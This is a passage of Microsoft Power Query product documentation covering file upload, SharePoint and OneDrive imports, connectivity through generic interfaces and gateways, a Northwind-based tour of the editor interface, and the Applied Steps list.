selected data source during the connection settings and authentication steps of the get
data process.

7 Note

This functionality is currently only available in Power Query Online and is enabled
by default for a select set of connectors. No configuration is needed to enable this
feature.

When selecting a connector that has this capability, it automatically signs you in with
Organizational account set as the authentication kind.
 Tip

If you'd like to authenticate with a different account, select the Switch account link
shown in the dialog.

Further reading
Authentication in Power Query Online
Microsoft identity platform and OAuth 2.0 On-Behalf-Of flow
Upload a file (Preview)
Article • 02/17/2023

You can upload files to your Power Query project when using Power Query Online.

The following connectors currently support the upload a file feature.

Excel
JSON
PDF
Text / CSV
XML

7 Note

Only files with the following extensions are supported for upload: .csv, .json, .pdf,
.prn, .tsv, .txt, .xl, .xls, .xlsb, .xlsm, .xlsw, .xlsx, .xml.

Upload a file experience


When you select a connector that offers the Upload file experience, you will notice a
radio button on the top that enables this feature.
When you select Upload file, the option underneath opens a simple dialog to let you
either drag a file or browse in your local file system to upload a file.

After you've selected your file, a progress bar shows you how the upload process is
going. Once the upload process is finished, you'll be able to see a green check mark
underneath your file name, with the message Upload successful and the file size right
next to it.
7 Note

The files that are uploaded through this feature are stored in your personal
Microsoft OneDrive for Business account.

Before you select the next button, you need to change the authentication kind from
Anonymous to Organizational account and go through the authentication process.
Start this process by selecting Sign in.

After going through the authentication process, a You are currently signed in message
underneath the Authentication Kind selection let's you know that you've successfully
signed in. After you've signed in, select Next. The file is then stored in your personal
Microsoft OneDrive for Business account, and a new query is created from the file that
you've uploaded.
Drag and drop experience in the query editor
When using the Power Query editor, you can drop a file on either the diagram view or
the queries pane to upload a file.

When dropping the file on either of the previously mentioned sections, a dialog with the
appropriate connector settings page will be shown, based on the file extension of the
file that's being uploaded.
SharePoint and OneDrive for Business
files import
Article • 02/17/2023

Power Query offers a series of ways to gain access to files that are hosted on either
SharePoint or OneDrive for Business.

Browse files

7 Note

Currently, you can only browse for OneDrive for Business files of the authenticated
user inside of Power Query Online for PowerApps.

2 Warning

This feature requires your browser to allow third party cookies. If your browser has
blocked third party cookies, the Browse dialog will appear but it'll be completely
blank with no option to close the dialog.

Power Query provides a Browse OneDrive button next to the File path or URL text box
when you create a dataflow in PowerApps using any of these connectors:

Excel
JSON
PDF
XML
TXT/CSV
When you select this button, you'll be prompted to go through the authentication
process. After completing this process, a new window appears with all the files inside the
OneDrive for Business of the authenticated user.

You can select the file of your choice, and then select the Open button. After selecting
Open, you'll be taken back to the initial connection settings page where you'll see that
the File path or URL text box now holds the exact URL to the file you've selected from
OneDrive for Business.
You can select the Next button at the bottom-right corner of the window to continue
the process and get your data.

From the Web connector using a file URL


1. Navigate to your OneDrive for Business location using a browser. Right-click the
file you want to use, and select Open in Excel.

7 Note

Your browser interface might not look exactly like the following image. There
are many ways to select Open in Excel for files in your OneDrive for Business
browser interface. You can use any option that allows you to open the file in
Excel.
2. In Excel, select File > Info, and then select the Copy path button.

To use the link you just copied in Power Query, take the following steps:

1. Select Get Data > Web.


2. In the From Web dialog box, select the Basic option and paste the link in URL.

3. Remove the ?web=1 string at the end of the link so that Power Query can properly
navigate to your file, and then select OK.
4. If Power Query prompts you for credentials, choose either Windows (for on-
premises SharePoint sites) or Organizational Account (for Microsoft 365 or
OneDrive for Business sites). The select Connect.

U Caution

When working with files hosted on OneDrive for Home, the file that you want
to connect to needs to be publicly available. When setting the authentication
method for this connection, select the Anonymous option.

When the Navigator dialog box appears, you can select from the list of tables, sheets,
and ranges found in the Excel workbook. From there, you can use the OneDrive for
Business file just like any other Excel file. You can create reports and use it in datasets
like you would with any other data source.

7 Note

To use a OneDrive for Business file as a data source in the Power BI service, with
Service Refresh enabled for that file, make sure you select OAuth2 as the
Authentication method when configuring your refresh settings. Otherwise, you
may encounter an error (such as, Failed to update data source credentials) when you
attempt to connect or to refresh. Selecting OAuth2 as the authentication method
remedies that credentials error.

SharePoint folder connector


You can read a detailed step-by-step guide on how to connect to the files hosted on
your SharePoint site in the SharePoint folder article.

After successfully establishing the connection, you'll be prompted with a table preview
that shows the files in your SharePoint site. Select the Transform data button at the
bottom right of the window.

Selecting the Transform Data button will take you to a view of the data called the File
system view. Each of the rows in this table represents a file that was found in your
SharePoint site.

The table has a column named Content that contains your file in a binary format. The
values in the Content column have a different color than the rest of the values in the
other columns of the table, which indicates that they're selectable.

By selecting a Binary value in the Content column, Power Query will automatically add a
series of steps in your query to navigate to the file and interpret its contents where
possible.

For example, from the table shown in the previous image, you can select the second row
where the Name field has a value of 02-February.csv. Power Query will automatically
create a series of steps to navigate and interpret the contents of the file as a CSV file.

7 Note

You can interact with the table by applying filters, sortings, and other transforms
before navigating to the file of your choice. Once you've finished these transforms,
select the Binary value you want to view.

OneDrive for Business experience


The SharePoint folder connector and its experience also work for files hosted on
OneDrive for Business. However, the URL that you need to use is different from the one
you would use for a SharePoint site. To locate your unique URL, go to your OneDrive for
Business portal and copy the URL from your browser. This URL may look similar to the
following example:

https://contoso-

my.sharepoint.com/personal/user123_contoso_com/_layouts/15/onedrive.aspx

You don't need the full URL, but only the first few parts. The URL you need to use in
Power Query will have the following format:

https://<unique_tenant_name>.sharepoint.com/personal/<user_identifier>

For example:
https://contoso-my.sharepoint/personal/user123_contoso_com

SharePoint.Contents function
While the SharePoint folder connector offers you an experience where you can see all
the files available in your SharePoint or OneDrive for Business site at once, you can also
opt for a different experience. In this experience, you can navigate through your
SharePoint or OneDrive for Business folders and reach the folder or file(s) that you're
interested in.

This experience is provided through the SharePoint.Contents function. Take the


following steps to use this function:

1. Create a Blank Query.

2. Change the code in the formula bar to be SharePoint.Contents("url") where url


is the same format used for the SharePoint folder connector. For example:

SharePoint.Contents("https://contoso.sharepoint.com/marketing/data")

7 Note

By default, this function tries to use SharePoint API Version 14 to connect. If


you aren't certain of the API version being used by your SharePoint site, you
might want to try using the following example code:
SharePoint.Contents("https://contoso.sharepoint.com/marketing/data",

[ApiVersion="Auto"]) .

3. Power Query will request that you add an authentication method for your
connection. Use the same authentication method that you'd use for the SharePoint
files connector.

4. Navigate through the different documents to the specific folder or file(s) that
you're interested in.

For example, imagine a SharePoint site with a Shared Documents folder. You can
select the Table value in the Content column for that folder and navigate directly
to that folder.
Inside this Shared Documents folder there's a folder where the company stores all
the sales reports. This folder is named Sales Reports. You can select the Table value
on the Content column for that row.

With all the files inside the Sales Reports folder, you could select the Combine files
button (see Combine files overview) to combine the data from all the files in this
folder to a single table. Or you could navigate directly to a single file of your
choice by selecting the Binary value from the Content column.

7 Note

The experience provided by the SharePoint.Contents function is optimal for


SharePoint and OneDrive for Business environments with a large number of files.
Lack of Support for Microsoft Graph in
Power Query
Article • 11/18/2022

Connecting to Microsoft Graph REST APIs from Power Query isn't recommended or
supported. Instead, we recommend users explore alternative solutions for retrieving
analytics data based on Graph, such as Microsoft Graph data connect.

You might find you can make certain REST calls to Microsoft Graph API endpoints work
through the Web.Contents or OData.Feed functions, but these approaches aren't reliable
as long-term solutions.

This article outlines the issues associated with Microsoft Graph connectivity from Power
Query and explains why it isn't recommended.

Authentication
The built-in Organizational Account authentication flow for Power Query's Web.Contents
and OData.Feed functions isn't compatible with most Graph endpoints. Specifically,
Power Query's Azure Active Directory (Azure AD) client requests the user_impersonation
scope, which isn't compatible with Graph's security model. Graph uses a rich set of
permissions that aren't available through our generic Web and OData connectors.

Implementing your own Azure AD credential retrieval flows directly from your query, or
using hardcoded or embedded credentials, also isn't recommended for security reasons.

OData libraries' incompatibility


Certain Graph endpoints and extensions to Graph may require the use of OData libraries
and features that aren't supported by Power Query's built-in OData.Feed function
because Graph and Power Query might be using two different versions of OData
libraries. These issues generally result in errors retrieving the service's $metadata
document. You might discover common guidance related to passing the Implementation
= "2.0" option to the OData.Feed function call to ensure the latest supported OData
libraries are used. While this approach does resolve certain OData incompatibilities, you
might still encounter errors over time as Graph and Power Query adopt new versions of
the OData libraries at different times.
Performance
The Microsoft Graph API is designed to support many application scenarios, but is
suboptimal for the large-scale data retrieval required for most analytics scenarios. If you
try to retrieve large amounts of data from Graph APIs, you might encounter
performance issues. Details around scenario applicability can be found in the Graph
documentation.

Using a custom connector


Some Power Query users have enabled Graph connectivity through custom connectors,
limiting their functionality to certain parts of the Graph API. This approach allows
connector developers to resolve general authentication issues by defining their own
Azure AD client with Graph specific permissions. Some custom connectors work around
OData challenges by using Web.Contents and simulating OData support within their
connector logic. However, this approach isn't recommended as users frequently hit the
performance and scalability issues described above. Developers who take this route
should continue with these limitations in mind.
Alternatives to out-of-box connectivity
in Power BI Desktop
Article • 02/17/2023

While Power BI Desktop offers out-of-box connectivity to over 150 data sources, there
might be cases where you want to connect to a data source for which no out-of-box
connector is available.

Connectivity through generic interfaces


It might be possible to connect to certain data sources without a built-in out-of-box
connector by using generic interface connectors.

For example, the ODBC connector can connect to services with ODBC interfaces, and the
Web connector can connect to services with REST API interfaces.

Using available Power BI out-of-box generic interface connectors to connect through


interfaces that the end data source supports lets you connect to many more data
sources on the internet than there are specific out-of-box connectors for.

To learn more about connectivity through generic interfaces, go to Connect to data


using generic interfaces.

Connectivity through a custom connector


The Power Query SDK lets you create custom connectors to unblock connectivity
scenarios to Power BI Desktop. You can create and distribute custom connectors to end
services and data sources they can authenticate to.

Community members and organizations can also share custom connectors that they've
created. While Microsoft doesn't offer any support, ownership, or guarantees for these
custom connectors, you might be able to use them for your scenarios. The Power BI
Partner Program also includes many partners that can build custom connectors. To learn
more about the program or find a partner, go to Contact a Power BI Partner .

Users that own an end service or data source can create a custom connector and might
be eligible to certify the connector to have it made available publicly out-of-box within
Power BI Desktop.
Request the data source owner to build and
certify a connector
As only the data source owner or an approved third party can build and certify a custom
connector for any service, end users are encouraged to share the demand for a
connector directly with the data source owner to encourage investment into creating
and certifying one.

Request in Power BI Ideas forum


In addition to directly engaging the data source owner, you should also create or vote
on ideas in the Power BI Ideas Forum to demonstrate the need and demand for a
connector. This feedback also helps encourage the data source owner to invest in a
certified connector that's available for users out-of-box in Power BI Desktop.
Connect to data using generic interfaces
Article • 04/06/2023

You can connect to a multitude of different data sources using built-in connectors that
range from Access databases to Zendesk resources. You can also connect to all sorts of
other data sources to further expand your connectivity options, by using the generic
interfaces (such as ODBC or REST APIs) built into Power Query Desktop and Power
Query Online.

Power Query data interfaces


Power Query includes an ever-growing collection of connectors that are built to connect
to a specific data source. For example, the SharePoint list connector provides specific
fields and supporting information during the connection sequence that are designed for
SharePoint lists. Other data sources found in the window that appears when you choose
to get data (in Power Query Desktop) or choose a data source (in Power Query Online)
work in the same way.

In addition, you can also connect to data sources that aren't identified in the get data
and choose data source lists by using one of the following generic data interfaces:

ODBC
OLE DB
OData
REST APIs
R Scripts

By providing the appropriate parameters in the connection windows that these generic
interfaces provide, the world of data sources you can access and use in Power Query
grows significantly.

In the following sections, you can find lists of data sources that can be accessed by
these generic interfaces.

Data sources accessible through ODBC


The ODBC connector in Power Query lets you import data from any third-party ODBC
driver simply by specifying a Data Source Name (DSN) or a connection string. As an
option, you can also specify a SQL statement to execute against the ODBC driver.
Data sources accessible through OLE DB
The OLE DB connector in Power Query lets you import data from any third-party OLE DB
driver simply by specifying a connection string. As an option, you can also specify a SQL
statement to execute against the OLE DB driver.
The following list details a few examples of the data sources that Power Query can
connect to using the generic OLE DB interface.

Power Query generic connector External data source Link for more information

OLE DB SAS OLE DB SAS provider for OLE DB

OLE DB Sybase OLE DB Sybase provider for OLE DB

Data sources accessible through OData


The OData feed connector in Power Query lets you import data from any OData URL
simply by typing in or pasting the OData URL. You can add multiple URL parts by typing
or pasting those links in the text boxes provided in the OData feed window.
The following list details a few examples of the data sources that Power Query can
connect to using the generic OData interface.

Power Query generic External data Link for more information


connector source

OData Coming soon Check back soon for OData data


sources

Data sources accessible through REST APIs


You can connect to data sources using the REST APIs and thereby use data from all sorts
of data sources that support REST.
The following list details a few examples of the data sources that Power BI Desktop can
connect to using the generic REST APIs interface.

Power BI Desktop generic External data Link for more information


connector source

REST APIs Couchbase DB Couchbase REST API


information

Data sources accessible through R Script


You can use R scripts to access data sources, and use that data in Power BI Desktop.
The following list details a few examples of the data sources that Power BI Desktop can
connect to using the generic R scripts interface.

Power BI Desktop generic connector External data source Link for more information

R Script SAS Files R script guidance from CRAN

R Script SPSS Files R script guidance from CRAN

R Script R Statistical Files R script guidance from CRAN


Manage connections (Preview)
Article • 09/18/2023

7 Note

This feature is currently available only in Power Query Online and is in public
preview.

With Power Query, you can connect to a multitude of data sources. When you connect
to a data source, you fundamentally create a connection to it. This connection consists
of your data source, credentials, and more information, such as privacy levels and
optional parameters for each data source. The Manage connections dialog is one
centralized way in your Power Query project to manage the connections that are being
referenced by your project.

The entry to the Manage connections dialog is available in the Power Query Home tab
in the ribbon's Data sources group.

Manage connections displays a list of all connections being referenced in your Power
Query project. It also notes the ability to unlink and edit from any of the connections in
your project.

Unlink a connection
Right next to the name of connection, and before the Source type column, there's an
icon to unlink the connection.

When you unlink a connection, you're simply removing the reference of the connection
from your project. Unlinking means that the definition of the connection isn't removed
from the back-end, but it can't be used in your project.

A new prompt then asks you to confirm that you want to unlink the connection.

7 Note

If you want to delete a connection from within a specific product integration, such
as Microsoft Power BI or Microsoft Fabric, be sure to check out the documentation
for each product on how a centralized connections portal can be used.

Edit a connection
Right next to the name of connection, and before the disconnect icon, there's an icon to
edit the connection.

The edit functionality allows you to change the following values:

Data gateway: If your data source uses a data gateway, you can modify the
gateway using the dropdown list from this field.
Authentication kind & credentials: Depending on the connector, you're presented
with multiple authentication kind options that are available to establish a
connection, and fields where you enter your credentials.
More Resources
Get Data experience in Power Query
Connectors available in Power Query
Change the gateway used in a dataflow
project
Article • 05/25/2023

When creating a new dataflow project in Power Query Online, you can select the on-
premises data gateway used for your specific data sources during the get data
experience. This article showcases how you can modify or assign a gateway to an
existing dataflow project.

7 Note

Before being able to change a gateway, make sure that you have the needed
gateways already registered under your tenant and with access for the authors of
the dataflow project. You can learn more about data gateways from Using an on-
premises data gateway in Power Platform dataflows.

Changing the gateway


To showcase how to change the gateway in a dataflow project, this article uses a query
that connects to a local folder as an example.

This query previously used a gateway named "Gateway A" to connect to the folder. But
"Gateway A" no longer has access to the folder due to new company policies. A new
gateway named "Gateway B" has been registered and now has access to the folder that
the query requires. The goal is to change the gateway used in this dataflow project so it
uses the new "Gateway B".

To change the gateway:

1. From the Home tab in Power Query, select Options.


2. In the Options dialog box, select Data load, and then select the gateway to use for
your project, in this case, Gateway B.

 Tip

If there were recent changes to your gateways, select the small refresh icon to
the right of the drop-down menu to update the list of available gateways.
3. After selecting the correct gateway for the project, in this case Gateway B, select
OK to go back to the Power Query editor.

Validate your data source path


After changing your data gateway, we recommended that you check your data source
paths to make sure that your queries are connecting to your data sources as expected.

7 Note

The M engine identifies a data source using a combination of its kind and path.

The kind defines what connector or data source function is being used, such as SQL
Server, folder, Excel workbook, or others.

The path value is derived from the required parameters of your data source
function and, for this example, that would be the folder path.

The best way to validate the data source path is to go into the query where your data
source function is being used and check the parameters being used for it. For this
example, there's only one query that connects to a folder and this query has the Source
step with the data source path defined in it. You can double-click the Source step to get
the dialog that indicates the parameters used for your data source function. Make sure
that the folder path, or the correct parameters for your data source function, is the
correct one in relation to the gateway being used.

Modify authentication
To modify the credentials used against your data source, select Get data in the Power
Query editor ribbon to launch the Choose data source dialog box, then define a new or
existing connection to your data source. In this example, the connector that's used is the
Folder connector.
Once in Connection settings, create a new connection or select or modify a different
connection for your data source.
After defining the connection details, select Next at the bottom-right corner and
validate that your query is loading in the Power Query editor.

7 Note

This process is the same as if you were to connect again to your data source. But by
doing the process again, you're effectively re-defining what authentication method
and credentials to use against your data source.
The Power Query user interface
Article • 04/10/2023

With Power Query, you can connect to many different data sources and transform the
data into the shape you want.

In this article, you'll learn how to create queries with Power Query by discovering:

How the "Get Data" experience works in Power Query.


How to use and take advantage of the Power Query user interface.
How to perform common transformations like grouping and merging data.

If you're new to Power Query, you can sign up for a free trial of Power BI before you
begin. You can use Power BI dataflows to try out the Power Query Online experiences
described in this article.

You can also download Power BI Desktop for free .

Examples in this article connect to and use the Northwind OData feed .

https://services.odata.org/V4/Northwind/Northwind.svc/

Connect to an OData feed

7 Note

To learn more about where to get data from each of the Microsoft products that
include Power Query, go to Where to get data.

To start, locate the OData feed connector from the "Get Data" experience. You can select
the Other category from the top, or search for OData in the search bar in the top-right
corner.
Once you select this connector, the screen displays the connection settings and
credentials.

For URL, enter the URL to the Northwind OData feed shown in the previous
section.
For On-premises data gateway, leave as none.
For Authentication kind, leave as anonymous.

Select the Next button.

The Navigator now opens, where you select the tables you want to connect to from the
data source. Select the Customers table to load a preview of the data, and then select
Transform data.
The dialog then loads the data from the Customers table into the Power Query editor.

The above experience of connecting to your data, specifying the authentication method,
and selecting the specific object or table to connect to is called the get data experience
and is documented with further detail in the Getting data article.

7 Note

To learn more about the OData feed connector, go to OData feed.

The Power Query editor user experience


The Power Query editor represents the Power Query user interface, where you can add
or modify queries, manage queries by grouping or adding descriptions to query steps,
or visualize your queries and their structure with different views. The Power Query user
interface has five distinct components.

1. Ribbon: the ribbon navigation experience, which provides multiple tabs to add
transforms, select options for your query, and access different ribbon buttons to
complete various tasks.
2. Queries pane: a view of all your available queries.
3. Current view: your main working view, that by default, displays a preview of the
data for your query. You can also enable the diagram view along with the data
preview view. You can also switch between the schema view and the data preview
view while maintaining the diagram view.
4. Query settings: a view of the currently selected query with relevant information,
such as query name, query steps, and various indicators.
5. Status bar: a bar displaying relevant important information about your query, such
as execution time, total columns and rows, and processing status. This bar also
contains buttons to change your current view.

7 Note

The schema and diagram view are currently only available in Power Query Online.

Using the Power Query editor


In this section, you'll begin transforming your data using Power Query. But before you
start working on transforming the data, we'll discuss some of the UI panes that can be
expanded or collapsed depending on their context. Selecting the appropriate panes lets
you focus on the view that matters the most to you. We'll also discuss the different
views that are available in the Power Query UI.

The ribbon
The ribbon is the component where you'll find most of the transforms and actions that
you can do in the Power Query editor. It has multiple tabs, whose values depend on the
product integration. Each of the tabs provides specific buttons and options, some of
which might be redundant across the whole Power Query experience. These buttons and
options provide you with easy access to the transforms and actions that you may need.

The Power Query interface is responsive and tries to adjust your screen resolution to
show you the best experience. In scenarios where you'd like to use a compact version of
the ribbon, there's also a collapse button at the bottom-right corner of the ribbon to
help you switch to the compact ribbon.

You can switch back to the standard ribbon view by simply clicking on the expand icon
at the bottom-right corner of the ribbon

Expand and collapse panes


You'll notice that throughout the Power Query user interface there are icons that help
you collapse or expand certain views or sections. For example, there's an icon on the top
right-hand corner of the Queries pane that collapses the queries pane when selected,
and expands the pane when selected again.

Switch between views


Apart from being able to collapse certain panes and sections in the Power Query user
interface, you can also switch what views are displayed. To switch views, go to the View
tab in the ribbon and you'll find the Preview and Layout groups, which control how the
Power Query user interface will look.

You're encouraged to try all of these options to find the view and layout that you feel
most comfortable working with. As an example, select Schema view from the ribbon.

The right side of the status bar also contains icons for the diagram, data, and schema
views. You can use these icons to change between views. You can also use these icons to
enable or disable the view of your choice.

What is schema view


The schema view offers you a quick and straightforward way to interact only with the
components of the schema for your table, such as the column names and data types.
We recommend the schema view when you want to do schema-related actions, such as
removing columns, renaming columns, changing column data types, reordering
columns, or duplicating columns.

7 Note

To learn more about schema view, go to Using Schema view.

For example, in schema view, select the check mark next to the Orders and
CustomerDemographics columns, and from the ribbon select the Remove columns
action. This selection applies a transformation to remove these columns from your data.

What is diagram view


You can now switch back to the data preview view and enable diagram view to use a
more visual perspective of your data and query.
The diagram view helps you visualize how your query is structured and how it might
interact with other queries in your project. Each step in your query has a distinct icon to
help you recognize the transform that was used. There are also lines that connect steps
to illustrate dependencies. Since both data preview view and diagram view are enabled,
the diagram view displays on top of the data preview.

7 Note

To learn more about diagram view, go to Diagram view.

Begin transforming your data


With diagram view enabled, select the plus sign. You can search for a new transform to
add to your query. Search for Group by and select the transform.
The Group by dialog then appears. You can set the Group by operation to group by the
country and count the number of customer rows per country.

1. Keep the Basic radio button selected.


2. Select Country to group by.
3. Select Customers and Count rows as the column name and operation respectively.

Select OK to perform the operation. Your data preview refreshes to show the total
number of customers by country.

An alternative way to launch the Group by dialog would be to use the Group by button
in the ribbon or by right-clicking the Country column.

For convenience, transforms in Power Query can often be accessed from multiple places,
so users can opt to use the experience they prefer.

Adding a new query


Now that you have a query that provides the number of customers per country, you can
add context to this data by finding the total number of suppliers for each territory.

First, you'll need to add the Suppliers data. Select Get Data and from the drop-down
menu, and then select OData.

The OData connection experience reappears. Enter the connection settings as described
in Connect to an OData feed to connect to the Northwind OData feed. In the Navigator
experience, search for and select the Suppliers table.

Select Create to add the new query to the Power Query editor. The queries pane should
now display both the Customers and the Suppliers query.

Open the Group by dialog again, this time by selecting the Group by button on the
ribbon under the Transform tab.
In the Group by dialog, set the Group by operation to group by the country and count
the number of supplier rows per country.

1. Keep the Basic radio button selected.


2. Select Country to group by.
3. Select Suppliers and Count rows as the column name and operation respectively.

7 Note

To learn more about the Group by transform, go to Grouping or summarizing


rows.

Referencing queries
Now that you have a query for customers and a query for suppliers, your next goal is to
combine these queries into one. There are many ways to accomplish this, including
using the Merge option in the Customers table, duplicating a query, or referencing a
query. For this example, you'll create a reference by right-clicking the Customers table
and selecting Reference, which effectively creates a new query that references the
Customers query.

After creating this new query, change the name of the query to Country Analysis and
disable the load of the Customers table by unmarking the Enable load option from the
Suppliers query.

Merging queries
A merge queries operation joins two existing tables together based on matching values
from one or multiple columns. In this example, the goal is to join both the Customers
and Suppliers tables into one table only for the countries that have both Customers and
Suppliers.

Inside the Country Analysis query, select the Merge queries option from the Home tab
in the ribbon.

A new dialog for the Merge operation appears. You can then select the query to merge
with your current query. Select the Suppliers query and select the Country field from
both queries. Finally, select the Inner join kind, as you only want the countries where
you have Customers and Suppliers for this analysis.
After selecting the OK button, a new column is added to your Country Analysis query
that contains the data from the Suppliers query. Select the icon next to the Suppliers
field, which displays a menu where you can select which fields you want to expand.
Select only the Suppliers field, and then select the OK button.
The result of this expand operation is a table with only 12 rows. Rename the
Suppliers.Suppliers field to just Suppliers by double-clicking the field name and
entering the new name.

7 Note

To learn more about the Merge queries feature, go to Merge queries overview.

Applied steps
Every transformation that is applied to your query is saved as a step in the Applied
steps section of the query settings pane. If you ever need to check how your query is
transformed from step to step, you can select a step and preview how your query
resolves at that specific point.
You can also right-click a query and select the Properties option to change the name of
the query or add a description for the query. For example, right-click the Merge queries
step from the Country Analysis query and change the name of the query to be Merge
with Suppliers and the description to be Getting data from the Suppliers query for
Suppliers by Country.

This change adds a new icon next to your step that you can hover over to read its
description.

7 Note

To learn more about Applied steps, go to Using the Applied Steps list.

Before moving on to the next section, disable the Diagram view to only use the Data
preview.
Adding a new column
With the data for customers and suppliers in a single table, you can now calculate the
ratio of customers-to-suppliers for each country. Select the last step of the Country
Analysis query, and then select both the Customers and Suppliers columns. In the Add
column tab in the ribbon and inside the From number group, select Standard, and then
Divide (Integer) from the dropdown.

This change creates a new column called Integer-division that you can rename to Ratio.
This change is the final step of your query, and provides the customer-to-supplier ratio
for the countries where the data has customers and suppliers.

Data profiling
Another Power Query feature that can help you better understand your data is Data
Profiling. By enabling the data profiling features, you'll get feedback about the data
inside your query fields, such as value distribution, column quality, and more.

We recommended that you use this feature throughout the development of your
queries, but you can always enable and disable the feature at your convenience. The
following image shows all the data profiling tools enabled for your Country Analysis
query.
7 Note

To learn more about Data profiling, go to Using the data profiling tools.

The advanced editor


If you want to observe the code that the Power Query editor is creating with each step,
or want to create your own shaping code, you can use the advanced editor. To open the
advanced editor, select the View tab on the ribbon, and then select Advanced Editor. A
window appears, showing the existing query code.
You can directly edit the code in the Advanced Editor window. The editor indicates if
your code is free of syntax errors. To close the window, select the Done or Cancel
button.

Accessing Power Query help


There are various levels of help that can be accessed in the Microsoft apps that use
Power Query. This section describes these help levels.

Power Query help in Excel


There are a couple of ways to access Power Query help information that specifically
applies to Power Query in Excel. One way to access the online Excel Power Query
documentation is to select File > Help > Help in the Power Query editor.

To access the inline Power Query help information in Excel, select the Help tab on the
Excel ribbon, and then enter Power Query in the search text box.

Power Query help in Power BI Desktop


There's a Help tab in the Power Query editor running on Power BI Desktop, but at this
time all of the options go to locations that supply Power BI information. You can also
reach this same Power BI Help information in the Power Query editor in Power BI
Desktop by selecting File > Help, and then selecting one of the help options.

Power Query help in Power BI service, Power Apps,


Customer Insights, and Azure Data Factory
The Power Query Help tab in Power BI service, Power Apps, Dynamics 365 Customer
Insights, and Azure Data Factory contains links to important sources of information
about Power Query.

The options in the help tab include links to:

Power Query documentation: Links to the Power Query documentation


Keyboard shortcuts: Links to the keyboard shortcuts article in the Power Query
documentation.
Support: Links to the support website of the Microsoft product that Power Query is
currently running in.
Power Query websight : Links to the Power Query website.
Power Query blog : Links to the Power Query blog
Power Query community : Links to the Power Query community.
Submit an idea: Links to the ideas website of the Microsoft product that Power
Query is currently running in.
Send feedback: Opens a window in Power Query that asks you to rate your
experience with Power Query, and to provide any additional information you
would like to supply.

7 Note

Currently, Azure Analysis Services doesn't contain any inline Power Query help links.
However, you can get help for Power Query M functions. More information is
contained in the next section.

Help for Power Query M functions


In addition to the Power Query help functions listed in the previous sections, you can
also get help for individual M functions from inside the Power Query editor. The
following steps describe how to get to this inline help.

1. With the Power Query editor open, select the insert step ( ) button.
2. In the formula bar, enter the name of a function you want to check.
a. If you are using Power Query Desktop, enter an equal sign, a space, and the
name of a function.
b. If you are using Power Query Online, enter the name of a function.
3. Select the properties of the function.
a. If you are using Power Query Desktop, in the Query Settings pane, under
Properties, select All properties.
b. If you are using Power Query Online, in the Query Settings pane, select
Properties.

These steps will open the inline help information for your selected function, and let you
enter individual properties used by the function.

Summary
In this article, you created a series of queries with Power Query that provides a
customer-to-supplier ratio analysis at the country level for the Northwind corporation.

You learned the components of the Power Query user interface, how to create new
queries inside the query editor, reference queries, merge queries, understand the
applied steps section, add new columns, and how to use the data profiling tools to
better understand your data.
Power Query is a powerful tool used to connect to many different data sources and
transform the data into the shape you want. The scenarios outlined in this article are
examples to show you how you can use Power Query to transform raw data into
important actionable business insights.
Using the Applied Steps list
Article • 08/07/2023

The Applied steps list is part of the Query settings pane in Power Query. Any
transformations to your data is dislayed in the Applied steps list. For instance, if you
change the first column name, the new column name is displayed in the Applied steps
list as Renamed columns.

Selecting any step displays the results of that particular step, so you can see exactly how
your data changes as you add steps to the query.

Access the Applied steps list


In most cases, the Applied steps list is displayed automatically when you connect to
your data source and open the Power Query editor. However, there may be times when
the Query settings section has been closed, and you need to reopen it.

If you're using Power Query Desktop (Excel, Power BI Desktop, Analysis Services) and the
Query Settings pane is closed, select the View tab from the ribbon, and then select
Query Settings.
The Query Settings pane then opens on the right side with the Applied Steps list.

If you're using Power Query Online (Power BI service, Power Apps, Data Factory
(preview), Microsoft 365 Customer Insights) and the Query settings pane is closed,
select the < icon above Query settings to open the pane.
The Query settings pane then opens on the right side with the Applied steps list.
The following image shows the different parts of the Applied steps list. Currently, not all
of these parts are found in Power Query Desktop. The Applied steps list in Power Query
Desktop only contains the delete step, step name, step description, and step settings
elements. The step icon and query folding indicator are found only in Power Query
Online.

The full list of the step parts are:


Delete step: When a step is selected, the delete icon appears on the left side of the
Applied steps list. If you select the icon, the step is deleted. More information:
Delete step
Step icon: Automatically assigned to the step, based on its type, and can't be
changed by the user. The step icon isn't available in Power Query Desktop.
Step name: A name automatically assigned to the step. The step name can be
changed using the step menu. More information: Rename step
Step description: A description of the step. Typically, no description is added when
the step is created. However, the step description can be added using the step
menu. More information: Edit step names and their descriptions
Step settings: Change any settings that are specific to the selected step. Not all
steps have settings. More information: Edit settings
Query folding indicator: Provides a graphic representation of the query folding
status of the selected step. This indicator isn't available in Power Query Desktop.
More information: Query folding indicators

In Power Query Online, if you hover the mouse cursor over one of the applied steps, an
informational display opens, listing the step name, step label, step description, step
settings, information about the step query folding, and a learn more link to the Query
folding indicators article. For more information about query folding, go to Power Query
query folding. The step label is automatically generated when the step is created, and
indicates the step type, as does the step icon. The step label and the step icon can't be
changed.

Step menu selections


When you right-click on a step in the applied steps list, a step menu pops up. The
following sections describe each of the options available in the step menu.
Edit settings
The Edit settings option lets you change specific settings for each individual step in the
Applied settings list. Not all steps have settings that can be changed. If no settings are
available, this option is grayed out in the step menu. For the steps that do have settings
that can be changed, selecting the Edit settings option brings up the settings page for
that particular step. For example, if the step is for an OData source, the OData source
page is displayed, where you can enter the OData source URL. As another example, if
the step is for a fuzzy cluster column, the Cluster values page is displayed, where you
can change the column to create the fuzzy clusters from.

You can also edit the settings for any step that contains the step settings icon. The two
places where the icon appears is in the applied settings step, and in the informational
display for the step. Just select the icon and the settings page for that particular step is
displayed.

Rename step
To rename a step, right-click the step and select Rename.
Enter in the name you want, and then either select Enter or select away from the step.

Delete step
To delete a step, right-click the step and select Delete.
Alternatively, select the X next to the step.
Delete until end
To delete a series of steps, right-click the first step of the series and select Delete until
end. This action deletes the selected step and all the subsequent steps.
Select Delete in the new window.

The following image shows the Applied steps list after using the Delete until end.
Insert step after
To add a new step, right-click on the last step in the list and select Insert step after.
To insert a new intermediate step, right-click on a step and select Insert step after. Then
select Insert on the new window.

To set a transformation for the new step, select the new step in the list and make the
change to the data. It automatically links the transformation to the selected step.

Move step
To move a step up one position in the list, right-click the step and select Move before.
To move a step down one position in the list, right-click the step and select Move after.
Alternatively, or to move more than a single position, drag and drop the step to the
desired location.
Extract the previous steps into query
You can also separate a series of transformations into a different query. This allows the
query to be referenced for other sources, which can be helpful if you're trying to apply
